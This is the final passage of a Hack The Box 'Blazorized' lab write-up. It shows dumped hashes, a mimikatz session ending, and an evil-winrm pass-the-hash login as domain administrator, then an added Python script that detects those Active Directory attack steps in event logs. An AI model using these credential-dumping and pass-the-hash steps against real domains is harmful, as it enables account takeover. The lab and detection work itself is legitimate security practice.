11 2fa495bdf9572e0d1ebb98bb6e268b01
12 7f54f57e971bcb257fc44a3cd88bc0e3
13 de0bba1f8bb5b81e634fbaa101dd8094
14 2d34f278e9d98e355b54bbd83c585cb5
15 06b7844e04f68620506ca4d88e51705d
16 97f5ceadabcfdfcc019dc6159f38f59e
17 ed981c950601faada0a7ce1d659eba95
18 cc3d2783c1321d9d2d9b9b7170784283
19 0926e682c1f46c007ba7072444a400d7
20 1c3cec6d41ec4ced43bbb8177ad6e272
21 30dcd2ebb2eda8ae4bb2344a732b88f9
22 b86556a7e9baffb7faad9a153d1943c2
23 c6e4401e50b8b15841988e4314fbcda2
24 d64d0323ce75a4f3dcf0b77197009396
25 4274d190e7bc915d4047d1a63776bc6c
26 a04215f3ea1d2839a3cdca4ae01e2703
27 fff4b2817f8298f09fd45c3be4568ab1
28 2ea3a6b979470233687bd913a8234fc7
29 73d831d131d5e67459a3949ec0733723


mimikatz(commandline) # exit
Bye!
PS C:\users\ssa_6010\documents>

And we got our hashes! Let’s get the root flag:

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i blazorized.htb -u administrator -H f55ed1465179ba374ec1cad05b34a5f3

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
8d9bf98c709ea4******************
*Evil-WinRM* PS C:\Users\Administrator\Documents>
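As a defender’s counterpart to the three privilege-escalation steps above (the WriteSPN abuse and RC4 TGS request, the scriptPath modification, and the DCSync), here is an added example that is not part of the write-up: simple detection logic run over constructed Windows Security event lines (5136, 4769, 4662) mirroring this box. The JSON field layout and the DC1$ replication allow-list are assumptions.

```python
import json
from typing import Iterable, Optional, Tuple

# Control-access-right GUIDs a DCSync caller must hold (AD schema values).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
RC4_HMAC = "0x17"                 # TicketEncryptionType Kerberoasting tools ask for
WATCHED_ATTRS = {"serviceprincipalname", "scriptpath"}
REPLICATION_ALLOWED = {"dc1$"}    # constructed allow-list: accounts expected to replicate

# Constructed sample events, one JSON object per line, using Security log
# field names for 5136 (object modified), 4769 (TGS request) and 4662
# (operation on object). Values mirror the steps taken in the write-up.
SAMPLE_EVENTS = r"""
{"EventID":5136,"SubjectUserName":"nu_1055","ObjectDN":"CN=RSA_4810,CN=Users,DC=blazorized,DC=htb","AttributeLDAPDisplayName":"servicePrincipalName","AttributeValue":"kujen/hehe"}
{"EventID":4769,"TargetUserName":"nu_1055","ServiceName":"RSA_4810","TicketEncryptionType":"0x17","IpAddress":"::ffff:10.129.23.80"}
{"EventID":4769,"TargetUserName":"nu_1055","ServiceName":"DC1$","TicketEncryptionType":"0x12","IpAddress":"::ffff:10.129.23.80"}
{"EventID":5136,"SubjectUserName":"RSA_4810","ObjectDN":"CN=SSA_6010,CN=Users,DC=blazorized,DC=htb","AttributeLDAPDisplayName":"scriptPath","AttributeValue":"A32FF3AEAA23\\kujen.bat"}
{"EventID":4662,"SubjectUserName":"ssa_6010","ObjectName":"DC=blazorized,DC=htb","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID":4662,"SubjectUserName":"DC1$","ObjectName":"DC=blazorized,DC=htb","Properties":"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
"""

Finding = Tuple[str, str, str]  # (rule, actor, detail)


def analyse_event(ev: dict) -> Optional[Finding]:
    """Match one event against the three steps; None when nothing is suspicious."""
    eid = ev.get("EventID")
    if eid == 5136:
        # Writes to servicePrincipalName (Kerberoast setup) or scriptPath (logon script abuse)
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr.lower() in WATCHED_ATTRS:
            return (f"{attr.lower()}-write", ev["SubjectUserName"],
                    f"{ev['ObjectDN']} <- {ev.get('AttributeValue')}")
    elif eid == 4769:
        # A service ticket for a user (non-$) account requested with RC4
        svc = ev.get("ServiceName", "")
        if ev.get("TicketEncryptionType", "").lower() == RC4_HMAC and not svc.endswith("$"):
            return ("rc4-tgs-request", ev["TargetUserName"],
                    f"service {svc} from {ev.get('IpAddress')}")
    elif eid == 4662:
        # Replication control-access rights exercised by something that is not a DC
        props = ev.get("Properties", "").lower()
        actor = ev.get("SubjectUserName", "")
        if any(g in props for g in REPL_GUIDS) and actor.lower() not in REPLICATION_ALLOWED:
            return ("dcsync", actor, f"replication rights used on {ev.get('ObjectName')}")
    return None


def detect(lines: Iterable[str]) -> list:
    """Run analyse_event over JSON lines, skipping blanks, and collect findings."""
    findings = []
    for raw in lines:
        raw = raw.strip()
        if raw:
            hit = analyse_event(json.loads(raw))
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for rule, actor, detail in detect(SAMPLE_EVENTS.splitlines()):
        print(f"[{rule}] {actor}: {detail}")
```

Auditing of attribute writes (5136) needs a SACL on the user objects, and the 4662 rule only works once replication rights are audited on the domain head; both are off by default.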

That was it for this box, hope you enjoyed it!
-0xkujen

  • Title: Hackthebox: Blazorized
  • Author: Foued SAIDI
  • Created at : 2024-11-08 20:09:27
  • Updated at : 2024-11-11 01:30:45
  • Link: https://kujen5.github.io/2024/11/08/Hackthebox-Blazorized/
  • License: This work is licensed under CC BY-NC-SA 4.0.